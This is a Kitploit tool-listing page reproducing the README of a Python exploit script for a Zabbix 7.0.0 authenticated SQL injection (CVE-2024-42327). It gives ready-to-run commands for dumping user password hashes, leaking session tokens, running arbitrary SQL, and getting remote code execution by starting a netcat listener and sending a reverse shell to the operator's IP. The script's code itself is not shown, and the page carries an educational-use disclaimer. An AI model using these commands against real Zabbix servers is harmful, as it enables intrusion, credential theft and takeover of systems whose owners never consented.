Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-42327_Zabbix_SQLi — This is for educational porpuses only. Please do not use agains unathorized systems. | Kitploit
Tools/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

This is for educational porpuses only. Please do not use agains unathorized systems.

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
11 year agoNot yet reviewed

🛡️ Zabbix 7.0.0 SQL Injection Exploit Script

A Python script to exploit a Zabbix 7.0.0 authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.

⚠️ DISCLAIMER:
This script is for educational and authorized penetration testing purposes only.
Do not use it on systems you do not own or have explicit permission to test.
The author is not responsible for any misuse or damage caused by this tool.


✨ Features

  • ✅ Authenticated SQL Injection against Zabbix 7.0.0
  • 🧑‍💻 Dump user hashes from the DB
  • 🔐 Leak session tokens
  • 🐚 Remote code execution via reverse shell (admin token required)
  • 🧠 Run custom SQL queries

🔧 Requirements

  • Python 3.6+
  • requests library

Install requirements if needed:

root@kitploit:~
pip install requests

🚀 Usage

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]

🔘 Available Modes

🧪 Examples

Dump User Hashes

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

Leak Session Tokens

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

Remote Code Execution (Reverse Shell)

root@kitploit:~
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

Custom SQL Injection

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 Project Structure

root@kitploit:~
sqliZabbix.py      # Main exploit script
README.md          # This documentation

🧑‍💻 Author

Anthony (@874anthony)

Crafted with love & curiosity 🐍

🔐 License

This project is released under the MIT License. Please use responsibly.

Download Tool
ModeDescriptionRequires Admin Token
leak-usersDumps all user IDs, usernames, password hashes, and roles❌
leak-tokensDumps all active session IDs from the database❌
rceSpawns a reverse shell via item.create exploit✅
customRun any custom SQL query via the injection❌